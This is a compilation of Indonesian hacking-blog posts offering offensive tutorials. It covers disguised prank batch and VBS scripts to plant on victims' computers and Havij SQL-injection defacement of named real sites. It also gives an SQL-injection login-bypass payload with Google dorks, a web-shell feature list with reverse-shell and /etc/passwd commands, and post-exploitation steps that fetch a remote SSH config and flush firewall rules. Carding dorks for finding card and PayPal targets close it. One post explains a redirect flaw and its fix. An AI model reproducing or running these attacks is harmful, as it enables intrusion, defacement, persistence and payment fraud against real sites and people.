Kumpulan Trik Hacking Komputer Sederhana Mematikan

Kumpulan Trik Hacking Komputer Sederhana Mematikan

trik  

ANONIMCYBER | Hallo sob seperti judul posting ini kita Langsung saja sob, Sambil ngopi ngopi kek hehe santai sadja.

1. Membuat Forced Shoutdown

Script:

@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s

simpan kode script yang berwarna Merah di Notepad dengan nama : hacking.BAT type file : All file
 sebarkan File tersebut di Komputer teman Anda,
 maka Komputer korban akan otomatis FORCED SHOUTDOWN 

2. Membuat Tombol Caps Lock menyala terus-menerus

Script:

Set wshShell =wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "{CAPSLOCK}"
 loop 

seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna biru di Notepad dengan nama : hacking.VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)

3. Membuat Pesan Jail mucul terus

Script: 

@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih, 
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

simpan kode script yang berwarna hijau dengan nama hacking.BAT type file : All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.
NB: Kamu bisa mengganti tulisan yang setelah tanda * itu dengan sesuka kamu

4.Membuat Komputer Hang dengan Kode script Notepad

Script:

start
start
start
start
start
start
start
start
start
start
start
start

simpan di Notepad dengan nama : hacking.BAT
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target
( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )

5.   Cara Merusak Komputer teman(Hacking Jail)

Caranya:

buka cmd(comand prompt), kalo belum tahu nyari dimana , klik start-run-ketik CMD-Lalu ketikan script ini

ASSOC.exe=.hank

lalu enter!!!

Maka program Seperti Ms.word/game-game akan ngambek untuk di jalan kan!

Setelah Puas !
Cara Mengembalikan seperti semula:
buka CMD lagi. lalu ketik 

 ASSOC.exe=EXEFILE

6.Membuat Tombol Caps Lock menyala terus-menerus

Script:

 Set wshShell =wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "{CAPSLOCK}"
 loop

 Simpan script pada Notepad dengan nama : hacking.VBS type File : All File

7.Jail dengan Membuka Tutup CD/DVD room

Script: 

Set oWMP = CreateObject("WMPlayer.OCX.7")
 Set colCDROMs = oWMP.cdromCollection
 do
 if colCDROMs.Count >= 1 then
 For i = 0 to colCDROMs.Count - 1
 colCDROMs.Item(i).Eject
 Next
 For i = 0 to colCDROMs.Count - 1
 colCDROMs.Item(i).Eject
 Next
 End If
 wscript.sleep 5000
 loop

Simpan script NOTEPAD tadi dengan nama : hacking.vbs type file : All

8.Cara Membuat Pesan ' Komputer Anda Butut Sekali'

Script :

Set wshShell = wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "Komputer Anda Butut Sekali"
 loop

simpan script dengan nama : hacking.vbs Ttpe file:All files

9.Hacking paling jahat dan membuat jangtung DEBUAR-DEBUAR

Script: 

@echo off
msg * Perkenal kan, saya adalah trojan virus!!!!! Setelah 1 menit Komputer anda akan error dan harus di re-instal !!!! TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c � SORRY!!! YOUR Computer is being #ERROR GOD BYE ���..�

simpan script dengan nama(terserah anda) .
contoh:
 Nama: Mozila.bat
Type file : All files

 Setelah itu, ganti icon nya sesuai dengan icon mozila firefox untuk mengelabui si korban 

Selamat mencoba.

source: http://ganiazmedia.blogspot.co.id/

Cara Mudah Mencari Celah Kelemahan Website Dengan Uniscan Di Kali Linux

Cara Mudah Mencari Celah Kelemahan Website Dengan Uniscan Di Kali Linux

website  

ANONIMCYBER | Haloo sobat apa kabar! disini saya akan membahas langkah langkah Cara Mudah Mencari Celah Kelemahan Website Dengan Uniscan Di Kali Linux pastinya sobat hacking atau cracking butuh mencari kelemahan suatu website kan? tenang saja saya akan membahasnya. simaklah pembahasan langkah langkah berikut yah sob.

Uniscan adalah scanner kerentanan untuk aplikasi web yang ditulis dalam bahasa pemrograman perlu dengan uniscan kita bisa mencari informasi tentang apakah sebuat situs mempunyai celah seperti xss,sqli,rfi/lfi.uniscan ini sudah tersedia di kali linux, jadi kita tidak perlu install lagi sob.

Oke Sob, Kita Lanjut langsung saja ke langkah-langkahnya

Cara Muda Mencari Celah Kelemahan Website Dengan Uniscan Di Kali Linux :
1. Buka terminal anda dan ketikan perintah

uniscan -h yaitu untuk melihat option yang ingin kita gunakan

2. Memulai scaning dengan perintah & tunggu scaning hingga selesai

uniscan -u www.target.com -qweds

CONTOH :

uniscan -u www.melbournefineart.com.au -qweds

3. Wow kita bisa lihat disini ternyata website tersebut vuln terhadap sql injection

Dan bisa kita tusbol menggunakan sqlmap pada kali linux

Scaning telah selesai

Sekian langkah langkah ini, gimana sob cukup mudahkan? Nah saya ingatkan nih untuk sobat, sobat harus ada tujuan tertentu jangan ada tujuan negative yahh. jika ada yang ditanyakan sobat bisa berkomentar dibawah. Trimkasih. 

Jangan lupa share yah dan sampai jumpa sob.

10 Istilah Yang Wajib Kamu ketahui Dalam Dunia Hacking

10 Istilah Yang Wajib Kamu ketahui Dalam Dunia Hacking

istilah  

ANONIMCYBER | Selamat pagi para pembaca! hari ini saya akan membahas 10 Istilah Yang Wajib Kamu ketahui Dalam Dunia Hacking Tapi saya akan membahasnya Dalam Tempo Yang Sesingkat-singkatnya hehe alias sangat singkat tapi berbobot.

Hacking adalah suatu usaha/kegiatan untuk memasuki sebuah jaringan komputer dengan tujuan mencari kelemahan atau celah dari sistem jaringan tersebut secara ilegal dan mengeksplorasinya. Sedangkan orang yang melakukan aktivitas Hacking disebut dengan Hacker.

Untuk Menjadi seorang hacker tidaklah mudah, sangat diperlukan ketekunan, kesabaran dan usaha keras yang kuat. jika sobat ingin belajar mempelajari tentang hacking, sobat harus mengenal dan mengetahui istilah istilahnya agar sobat tidak bingung ketika ada istilah asing atau belum sobat kenal.

Berikut 10 Istilah Dalam Dunia Hacking

1. Bug
Bug adalah kesalahan pada pemograman yang menyebabkan sistem dapat diekploitasi atau error dengan kondisi tertentu. Dalam web Hacking terdapat beberapa bug seperti, RFI,LFI,SQLI,RCE,XSS dan sebagainya.

2. SQL Injection, DDos dan Deface

SQL Injection adalah suatu jenis penyerangan yang mengijinkan user peyerang untuk mengakses database server. 

Sedangkan DDos adalah teknik yang membuat sistem crash karena overload sehingga tidak akan bisa diakses atau bahkan bisa untuk mematikan service.
Deface adalah teknik yang sering digunakan oleh Hacker, yang nantinya Hacker dapat mengubah tampilan dari suatu website secara paksa dan ilegal.

3. Phising dan Debug
Phising adalah tindakan memperoleh informasi pribadi seperti ID user, password, PIN, nomer rekening bank, kartu kredit secara ilegal.
Debug adalah sebuah kegiatan mencari Bug (Kesalahan pemograman) dan setelah menemukannya, maka akan memperbaiki bug yang sudah ditemukan tadi. Atau lebih singkatnya Debug adalah proses menemukan dan memperbaiki Bug.

4. Fake Login, Fake Process dan Keylogger
Fake Login ini sebuah halaman tiruan/ palsu yang sengaja dibuat untuk mengelabui user dengan tujuan untuk mendapatkan informasi-informasi penting dari user.
Fake Process sebuah Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, yang bertujuan untuk mengelabui admin sistem.
Sedangkan KeyLogger adalah sebuah software yang dipasang di komputer agar dapat mencatat semua aktivitas yang terjadi pada keyboard secara diam-diam dan tidak kasat mata sehingga pengguna tidak menyadarinya.

5. Virus, Worm, dan Trojan
Virus adalah sebuah kode jahat yang mempunyai sistem kerja sama dengan virus yang menyerang pada manusia, virus ini dapat menggandakan diri dan seperti halnya parasit yang hidup pada file yang diinfeksinya. Jika file terkena virus, File yang terinfeksi bisa rusak atau ukuran file tersebut akan bertambah besar.
Worm adalah kode jahat yang sistem kerjanya sama seperti cacing, menggandakan diri lalu menyebar dengan cepat.
Sama halnya kuda Trojan yang ada pada Zaman Romawi, Trojan akan masuk kedalam sistem untuk mengintip dan mencuri informasi penting yang ada didalamnya kemudian data yang berhasil dicuri akan dikirimkan kepada si pemilik trojan tersebut.

6. Backdoor
Backdoor atau pintu belakang adalah yang dipasangkan di komputer yang menjadi sasaran, kemudian sistem yang berhasil dimasukinya akan diekploitasi oleh si penyerang. Dengan menggunakan Backdoor, sang attacker bisa masuk ke komputer korban kapan saja meskipun tidak ada sentuhan fisik sekalipun.

7. Black Hat dan White Hat
Black Hat adalah sebuah kelompok hacker dengan kemampuan mencuri data atau menghambar sistem yang ada pada komputer korban. Black Hat di kenal dengan kemampuannya untuk menghilangkan jejak sampai tidak mampu dilacak.
Jika ada jahat pasti ada yang baik, begitu pula dalam dunia Hacker jika Black Hat lebih cenderung untuk merusak dan mencuri, ada juga White Hat yang cenderung lebih memanfaatkan pengetahuan yang mereka miliki untuk memuaskan rasa ingin tahu mereka.

8. Script KiddieSebuah pola serangan yang sering kali digunakan oleh Hacker pemula menggunakan indera bantu ringan yang bisa didapatkan dibanyak situs-situs Hacker lainnya. Script ini hanya berisi Scipt sederhana yang nantinya akan dipakai untuk mendeface atau melancarkan DOS pada korbannya.

9. Buffer Overflow

Merupakan sebuah kelemahan yang praktis yang bisa ditemukan dan dimanfaatkan oleh sang Hacker dalam sebuah sistem. Jika Sistem Operasi atau program tidak dikode secara sempurna maka Hacker bisa membuat komputer korban menjadi terganggu dengan mengirimkan perintah-perintah yang akan membuat gangguan berlangsung lebih lama.

10. ExploitExploit 

Artinya keberadaan sebuah celah keamanan dalam perangkat lunak yang berjalan pada sebuah komputer. Lewat Exploit ini juga serangan hacker akan terbuka lebar, setiap aplikasi atau sistem operasi baru bermunculan maka genderang perang di tabuh buat para hacker untuk memulai mencari kelemahannya.

Itulah 10 Istilah Yang Wajib Kamu Ketahui Dalam Dunia Hacking, Nah saran saya kalo sobat ingin hapal dan tahu arti ini semuanya, sobat harus mempraktekannya ketika sobat belajar hacking.

Sekian artikel ini, Semoga bermanfaat dan sampai jumpa. Jangan Lupa Share yah

Download Buku Sakti Hacker Full PDF 100%

Download Buku Sakti Hacker Full PDF 100%

hacking  

ANONIMCYBER | Hallo sobat kali ini saya akan membagikan BUKU SAKTI HACKER buku ini memang jarang orang lain atau toko toko buku yang saat ini menjualnya. jadi saya akan baik hati membagikan buku ini dalam format .PDF Oke langsung saja download dibawah

Cover Buku Sakti Hacker

Properti Ebook :

• Judul Ebook : Buku Sakti Hacker
• Penerbit : mediakita
• Penulis :EFVY ZAM
• Jumlah halaman : 357

Fitur Buku :

1. Menemukan Username dan Password sebuah situs
2. Menemukan Username dan Password akun Facebook
3. Menemukan Username dan Password Internet Banking
4. Menemukan Username dan Password akun Paypal
5. Membuat dan Mengirim Spyware dan masih banyak lagi

Buku Sakti Hacker | DOWNLOAD

Sampai Jumpa sob!

Deteksi Celah NO REDIRECT Pada Suatu Situs Menggunakan CURL

Deteksi Celah NO REDIRECT Pada Suatu Situs Menggunakan CURL

write up  

Halo selamat malam, kali ini saya akan memberikan sedikit tutorial bagaimana menemukan sebuah celah/vulnerability NO REDIRECT pada suatu situs. Celah ini ditemukan pada suatu halaman/file yang seharusnya dapat diakses hanya pada user yang memiliki akses tertentu (user yang sudah login).

Contohnya pada suatu kasus untuk dapat masuk ke halaman dashboard admin yang terdapat pada file /admin/home.php, kita diharuskan login terlebih dahulu. Maka dari itu, biasanya kita akan di redirect/arahkan ke halaman login dahulu, misalkan di file /admin/login.php


Sudah paham maksudnya?
Jika masih belum paham, mari simak penjelasan berikut.


Saya menemukan suatu sample situs yang memiliki celah ini, coba kalian kunjungi situs berikut:
http://shmsupport.telkomspeedy.com/admin/ maka kalian akan di arahkan/redirect ke halaman situs tersebut yang beralamat pada http://shmsupport.telkomspeedy.com/admin/login.php?MSG=NOSESSION

Dapat Simpulkan, bahwa pada folder /admin/ terdapat sebuah file index.php yang mem-validasi bahwa hanya user yang sudah LOGIN saja yang dapat mengakses ini. Simplenya, $_SESSION user sudah ter-set.

 Sayangnya, ada cara bagaimana mengakses /admin/ tanpa harus login terlebih dahulu. Bypassing dengan Query SQL??? 

***Bukan jawaban yang tepat pada pembahasan kali ini***

Lalu bagaimana?

*Cukup gunakan command CURL pada console/terminal/CMD, lalu jalankan command berikut:

$ curl -v http://shmsupport.telkomspeedy.com/admin/

Akan muncul sebuah hasil, dimana di perlihatkan bahwa kita dapat melihat isi dari halaman dashboard admin tersebut.

Melihat tulisan LOGOUT bukan? Padahal kita tidak login sama sekali ke website tersebut. Yap, ini merupakan sebuah bug. Melalui console seperti memang akan terbatas untuk melakukan hal-hal lainnya, tapi anda bisa menggunakan sebuah addons pada Browser untuk melakukan ini yaitu NO REDIRECT (https://addons.mozilla.org/en-US/firefox/addon/noredirect/).

*******************************
Kenapa ini bisa terjadi?
Jika kita pernah coding hal seperti ini, kita akan membuat sebuah validasi $_SESSION, untuk memastikan apakah user yang mengakses halaman tersebut sudah login atau belum. Biasanya akan di coding seperti ini:

if(!isset($_SESSION[user])) {
             // lakukan redirect disini jika user belum login
}

Tapi codingan diatas masih memiliki bug, memang jika kita mengaksesnya melalui browser kita akan di arahkan ke halaman yang akan di set di codingan tersebut, namun jika kita melihat melalui CURL tadi, halamannya akan bisa kita lihat.

*******************************
Lalu bagaimana memperbaiki bug ini? dan apakah ini fatal?

Untuk memperbaiki ini simple saja, tambahkan die() ataupun exit() setelah bagian Lakukan Redirect.

if(!isset($_SESSION[user])) {
              // lakukan redirect disini jika user belum login
              exit();
}

Codingan diatas akan langsung menutup tadi jika kita mengakses melalui CURL, dan potongan code dashboard admin tadi tidak akan bisa dilihat lagi.

Jika terdapat informasi yang sensitif seperti dokument pribadi/dokument user/customer/client atau hal lainnya yang terdapat pada halaman tersebut, akan sangat mudah sekali didapatkan karena mereka masuk/melihat tanpa harus melalui sebuah authentikasi yang valid. Hal ini juga bisa menjadi awal terjadinya Exploitasi dengan CSRF, dan lainnya.



Oke sekian dulu tutorial kali ini, semoga bermanfaat.

Cara Deface Menggunakan Havij Pro 1.17

Cara Deface Menggunakan Havij Pro 1.17

hacking  

ANONIMCYBER | Hallo sobat, hari ini saya akan mengajari sobat deface menggunakan "havij pro 1.17" versinya sudah pro jadi sobat tinggal download dan pake, okeyy kita mulai saja.

Apa yang kamu butuhkan

• Havij Pro 1.17 DOWNLOAD
• Koneksi Internet
• Yang paling penting "Target"

Setelah download, kita harus cari target dulu, contoh target yang saya targetkan ini adalah http://www.boboho.com/interior-articles.php?id=5 dan situs yang saya akan hack adalah boboho.com

Klik Analyze yang ada disamping link target

Jika sudah dapet Databasenya "boboho.com" sekarang kita klik tombol Tables > klik Get Tables nanti akan ada seperti ini

Pilih wp_users dan klik tombol Get Columns. dan akan keluar sub database seperti ini :

Nah, Sekarang kita udah dapet Password sama Usernamenya Admin. sekarang Cari URL Adminnya pakai Admin Finder.

Sekarang Tinggal Masukin ID sama Password di URL Admin dan Ganti index.php dengan index Deface sobat. Selesai dah success!.

DOWNLOAD | HAVIJ PRO 1.17

Jangan Lupa share yah sob! Sampai jumpa!

Tutorial Reverse Shell Dengan Bind Port

Tutorial Reverse Shell Dengan Bind Port

website  

Oke, kali ini gua akan share gimana caranya Reverse Shell dengan bind port. Kebanyakan orang kesusahan waktu Reverse Shell dengan BackConnect. Cara ini cukup simple kok. Oke Langsung Simak aja.

Disini, saya menggunakan shell indoxploit V.3 untuk bind port nya.

Jalankan command bind port pada shell indoxploit V.3.

$ rvr bp [PORT] perl

Setelah itu, kalian akan mendapatkan response seperti ini.

Langsung saja, berikutnya buka terminal/CMD kalian.

Jalankan command nc.

$ nc [IP] [PORT]

Oke itu saja, mudah bukan?

Sekian dulu kawann..

Bypass 406 & Auto Delete Shell Oleh Server Dengan TMP Shell by IndoXploit

Bypass 406 & Auto Delete Shell Oleh Server Dengan TMP Shell by IndoXploit

website  

Oke kali ini gua pengen share sedikit trik, bagaimana membypass sebuah server yang 'bikin jengkel' waktu upload shell-shell besar seperti (indoxploit shell, wso, b374k, c99, dll). Yap Not Acceptable.

Mudah saja untuk mengakalinya.

Write sebuah file backdoor ke dalam directory /tmp, lalu panggil shell itu melalui current directorynya dengan sebuah PHP Function 'include()'

Penjelasan lebih lanjut.

Disini, saya sudah membuat backdoor khusus agar lebih mudah memanggil backdoor lain yang kita inginkan.

Source: https://pastebin.com/z8WiCv3S

Ubah bagian $URL, isilah dengan URL Shell Backdoor yang kalian inginkan.

Langsung saja buka file backdoornya.

 Jika backdoor TMP Shell terus-menerus redirect & menghasilkan blank page. Itu tandanya file backdoor yang dipanggil tidak berhasil di Write pada directory /tmp.

Oke sekian dulu.
Semoga Bermanfaat.

Konfigurasi CA Certificate Burp Suite di Browser

Konfigurasi CA Certificate Burp Suite di Browser

hacking  

Secara default, saat kalian mengunjungi situs HTTPS via Burp, Proxy menghasilkan sertifikat SSL untuk setiap host, yang di-sign oleh sertifikat Otoritas Sertifikat (CA) sendiri. Sertifikat CA ini dihasilkan Burp pertama kali dijalankan, dan disimpan secara lokal. Untuk menggunakan Burp Proxy lebih efektif dengan situs web HTTPS, kamu perlu memasang sertifikat CA Burp sebagai trusted root di browser Anda.

Read More

IndoXploit Shell First Edition [ V.3 ]

IndoXploit Shell First Edition [ V.3 ]

website  

Haloo, selamat malammm.

Kali ini kita akan share lagi shell backdoor indoxploit. Kali ini kami tambah beberapa fitur-fitur baru yang sebelumnya tidak ada di indoxploit shell, tentu serta beberapa perubahan bentuk shell dan lainnya. Oke Langsung saja disimak.

IndoXploit Shell V.3 menggunakan 'Command Based' atau bisa dibilang untuk menjalankan beberapa tools/fiturnya, kalian harus memasukan command tertentu.

Contoh command untuk memanggil tools 'Adminer'

Login Shell, default password: IndoXploit

 [ List Tools - IndoXploit Shell Backdoor V.3 ]

=============================================
**** COMMAND BASED *****
 - Read File
 usage: rf [filename]
 example: rf /etc/passwd

 - Spawn File/Tools 
 usage: spawn [name]

 [name]
- Adminer (adminer)
 - WebConsole (webconsole)
 - CGI Telnet 1 (cgitelnet1)
 - CGI Telnet 2 (cgitelnet2)
 - PHPINFO (phpinfo)

 example:
 spawn adminer
 spawn webconsole
 spawn cgitelnet1

- Jumping
usage: jumping

- Config Grabber
usage: idxconfig

 - Symlink 
 usage: symlink

 - Reverse Shell 
 [Back Connect]
 usage: rvr bc [IP] [PORT] [TYPE]
 example:
 rvr bc 127.0.0.1 1337 bash
 rvr bc 127.0.0.1 1337 perl

 [Bind Port]
 usage: rvr bp [PORT] [TYPE]
 example:
 rvr bp 1337 perl

 - KRDP - Create RDP Account (for windows server only) 
 usage: krdp

 - Logout From Shell
usage: logout

 - Kill Backdoor 
usage: killme
=============================================
- Mass Password Change
- Fake Root
- Cpanel Crack
- Mass Deface/Delete File
- Zone-H Mass Submit

#Link Download: 
http://server.indoxploit.or.id/indoxploit_v3.txt

###############################################################################

Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.

Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.

Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.

Tanpa kalian kita tidak akan BESAR seperti sekarang.

Greetz: 

All Member IndoXploit. & All My Friends.

###############################################################################

Special Thanks: 

Depok Cyber Security | Sanjungan Jiwa | 0x1999

###############################################################################

Mendapatkan Akses SSH Setelah Rooting Server

Mendapatkan Akses SSH Setelah Rooting Server

hacking  

Haloo.. kali ini saya mau berbagi sedikit tips saja barangkali ada yang belum tau. Biasanya yang pernah rooting server dengan localroot dirtyc0w sering pas sudah eskalasi, add user dan ganti password ternyata tidak bisa masuk ke ssh karena port ssh yang diganti, atau password auth dimatikan (sysadmin server tersebut login menggunakan auth key). Ada juga kasus dimana proses privilege escalation langsung memanggil tty dengan id root, namun ketika menambahkan user tidak bisa karena akses ke perintah seperti passwd iptables, dll dibatasi.

Oke kita bahas dulu kasus pertama.

dirty cow exploit - eksekusi localroot - ganti user dan password - tidak bisa masuk ke ssh.

Kemungkinan nya ada dua, tidak diijinkan login dengan password , atau memang ssh hanya bisa diakses melalui ip tertentu saja (pengaturan iptables).

Trik nya :

su firefat
cd /etc/ssh/
rm sshd_config
wget http://dl.linuxsec.org/sshd.txt -O sshd_config
iptables -F
service ssh restart

Perintah diatas akan menghapus konfigurasi ssh yang dilakukan sysadmin dan mengembalikannya ke pengaturan default dimana password login diijinkan dan port nya di port 22. iptables -F adalah melakukan flushing iptables. Hal ini untuk menghapus semua rule iptables yang ada. Sehingga misalnya rule awal hanya mengijinkan ip tertentu login ke ssh, sekarang kita bisa login ke ssh dari ip kita.

Yang pertama diatas adalah yang kasus paling gampang nya. Nah yang kedua ini lumayan banyak juga

dirty cow exploit - eksekusi localroot - ganti user dan password - tidak bisa masuk ke ssh - /bin/su denied

Nah kalau yang ini, kita gunakan trik berikut.

Kita lakukan eskalasi server dengan localroot yang langsung memanggil tty dengan id root.
Cek Disini

Sehingga proses nya menjadi

exploit - run - id root

log :

./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 30768
Racing, this may take a while..
/usr/bin/passwd overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped
thread stopped
root@whmdaqu [/home/bugs/public_html/]#

karena id kita sekarang root kita tinggal mengikuti perintah di kasus pertama. Reset sshd config, flush iptables, add user setara root.

Nah kasus yang ketiga

exploit - tty dengan id root - tidak bisa menjalankan perintah passwd, iptables dan perintah lainnya.

Hal ini kemungkinan akses ke perintah sistem dibatasi saat kita menggunakan tty.

Log :

root@server [/root]# /usr/sbin/useradd kontol -g root -d /home/kontol
/usr/sbin/useradd kontol -g root -d /home/kontol
root@server [/root]# passwd kontol
passwd root
root@server [/root]#

yup, prompt password tidak mau terpanggil.

Ini dikarenakan akses di tty dibatasi. bahkan meski memiliki id root kita tidak bisa menjalankan perintah iptables.

Trik yang saya coba dan work :

cd ~
ssh-keygen -t rsa
cp /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys
ssh root@localhost

Kita gunakan akses ssh menggunakan auth key. Kenapa di localhost, kenapa tidak langsung pakai auth key dari server kita ? Disini saya asumsikan firewall server target aktif dan hanya mengijinkan akses ssh dari ip tertentu saja.

Setelah add ssh key, berikut log nya :

root@server [~]# ssh root@localhost
ssh kontol@localhost
Attempting to create directory /root/perl5
root@server [~]#

Memang terlihat sama namun yang pertama adalah tty, dan yang kedua adalah ssh shell.

Sekarang karena yang kita punya bukan tty lagi seharusnya limit atau batasan perintah seperti tidak bisa command iptables, tidak bisa command passwd sudah tidak ada. Selanjutnya tinggal ikuti ara paling atas .

Sekian tutorial kali ini, semoga bermanfaat.

Cara Deface Metode Bypass Admin Login

Cara Deface Metode Bypass Admin Login

hacking  

Oke Gan, Kali ini saya akan membahas Cara Deface Dengan  FCKeditor Vulnerability File Upload, Sebelum Itu Kita Dorking Terlebih Dahulu

+  Dork   :  - inurl://admin intitle:admin login

                   - inurl://login intitle:admin login

                   - inurl://admin/login intitle:admin login

                   - inurl://admin/admin intitle:admin login

                   - Sisanya bisa di kembangin sendiri

+ Bypass  User         : '=''or'
                 Password : '=''or'
 

 

Oke Langsung Aja Ya

Dorking Ke Mbah Goole

Kemudian Kita Pijih Target

Kalau Sudah Kita Langsung Saja Bypass Admin Loginnya dengan u/p '=''or'

Jika Sudah Berhasil Masuk Langsung Saja Cari Tempat Upload Shell

Jika Tidak Bisa Upload Shell.php Gunakan Tamper Data dan Rubah ext menjadi Shell.php.jpg

Lalu Tinggal Cari Shell mu, Bisa Dengan Cara Buka Home Page Dan Klik Pada Salah Satu Gambar, Nah Kemungkinan Shell mu Berada Pada Satu Folder Dengan Gambar Tersebut

Sekian Tutorial Dari Saya , Kalau Belum Paham Bisa Comment Dibawah, Happy Deface :*

Fredi Blog

Cara Deface Metode FCKeditor Vulnerability File Upload

Cara Deface Metode FCKeditor Vulnerability File Upload

hacking  

Oke Gan, Kali ini saya akan membahas Cara Deface Dengan  FCKeditor Vulnerability File Upload, Sebelum Itu Kita Dorking Terlebih Dahulu

+ Dork    : - inurl:advert_detail.php?id=

 

+Exploit :  http://site.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

Oke Langsung Aja Ya

Dorking Ke Mbah Goole

Kemudian Kita Pijih Target  Dan Masukkan Exploit, Kalau Vuln Akan Seperti Ini

Kalau Sudah Kita Tinggal Upload Script.html

Sekian Tutorial Dari Saya , Kalau Belum Paham Bisa Comment Dibawah, Happy Deface :*

 

Gandeng Offensive Security, Microsoft akan Rilis Windows 10 Hacker Edition

Gandeng Offensive Security, Microsoft akan Rilis Windows 10 Hacker Edition

Windows  

Microsoft kembali membuat gebrakan. Setelah bekerjasama dengan Canonical untuk menghadirkan "Ubuntu on Windows", kali ini mereka bekerjasama dengan Offensive Security untuk pengembangan Windows 10 Hacker Edition.

Read More

Dork Carding CC/PP Fresh Update September 2017

Dork Carding CC/PP Fresh Update September 2017

hacking  

  

DorkCC

inurl:".php?cat="+intext:"Paypal"+site:UK

inurl:".php?cat="+intext:"/Buy Now/"+site:.net

inurl:".php?cid="+intext:"online+betting"

inurl:".php?id=" intext:"View cart"

inurl:".php?id=" intext:"Buy Now"

inurl:".php?id=" intext:"add to cart"

inurl:".php?id=" intext:"shopping"

inurl:".php?id=" intext:"boutique"

inurl:".php?id=" intext:"/store/"

inurl:".php?id=" intext:"/shop/"

inurl:".php?id=" intext:"toys"

inurl:".php?cid="

inurl:".php?cid=" intext:"shopping"

inurl:".php?cid=" intext:"add to cart"

inurl:".php?cid=" intext:"Buy Now"

inurl:".php?cid=" intext:"View cart"

inurl:".php?cid=" intext:"boutique

inurl:".php?cid=" intext:"/store/"

inurl:".php?cid=" intext:"/shop/"

inurl:".php?cid=" intext:"Toys"

inurl:".php?cat="

inurl:".php?cat=" intext:"shopping"

inurl:".php?cat=" intext:"add to cart"

inurl:".php?cat=" intext:"Buy Now"

inurl:".php?cat=" intext:"View cart"

inurl:".php?cat=" intext:"boutique

" inurl:".php?cat=" intext:"/store/"

inurl:".php?cat=" intext:"/shop/"

inurl:".php?cat=" intext:"Toys"

inurl:".php?catid="

inurl:".php?catid=" intext:"View cart"

inurl:".php?catid=" intext:"Buy Now"

inurl:".php?catid=" intext:"add to cart"

inurl:".php?catid=" intext:"shopping"

inurl:".php?catid=" intext:"boutique"

inurl:".php?catid=" intext:"/store/"

inurl:".php?catid=" intext:"/shop/"

inurl:".php?catid=" intext:"Toys"

inurl:".php?categoryid="

inurl:".php?categoryid=" intext:"View cart"

inurl:".php?categoryid=" intext:"Buy Now"

inurl:".php?categoryid=" intext:"add to cart"

inurl:".php?categoryid=" intext:"shopping"

inurl:".php?categoryid=" intext:"boutique"

inurl:".php?categoryid=" intext:"/store/"

inurl:".php?categoryid=" intext:"/shop/"

inurl:".php?categoryid=" intext:"Toys"

inurl:".php?pid="

inurl:".php?pid=" intext:"shopping"

inurl:".php?pid=" intext:"add to cart"

inurl:".php?pid=" intext:"Buy Now"

inurl:".php?pid=" intext:"View cart"

inurl:".php?pid=" intext:"boutique"

Dork pp

inurl:".php?cat="+intext:"Paypal"+site:sg

inurl:".php?cat="+intext:"/Buy Now/"+site:.sg
inurl:".php?cid="+intext:"online+betting"
inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"boutique"
inurl:".php?id=" intext:"/store/"
inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"
inurl:".php?cid="
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cid=" intext:"Buy Now"
inurl:".php?cid=" intext:"View cart"
inurl:".php?cid=" intext:"boutique"
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid="
inurl:".php?cat="
inurl:".php?cat=" intext:"shopping"
inurl:".php?cat=" intext:"add to cart"
inurl:".php?cat=" intext:"Buy Now"
inurl:".php?cat=" intext:"View cart"
inurl:".php?cat=" intext:"boutique"
inurl:".php?cat=" intext:"/store/"
inurl:".php?cat=" intext:"/shop/"
inurl:".php?cat=" intext:"Toys" 
inurl:".php?catid="
inurl:".php?catid=" intext:"View cart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?catid=" intext:"shopping"
inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"Toys"
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
paypal .php?id=
paypal .php?coID=
paypal .php?num=
paypal .php?avd=
paypal .php?category=
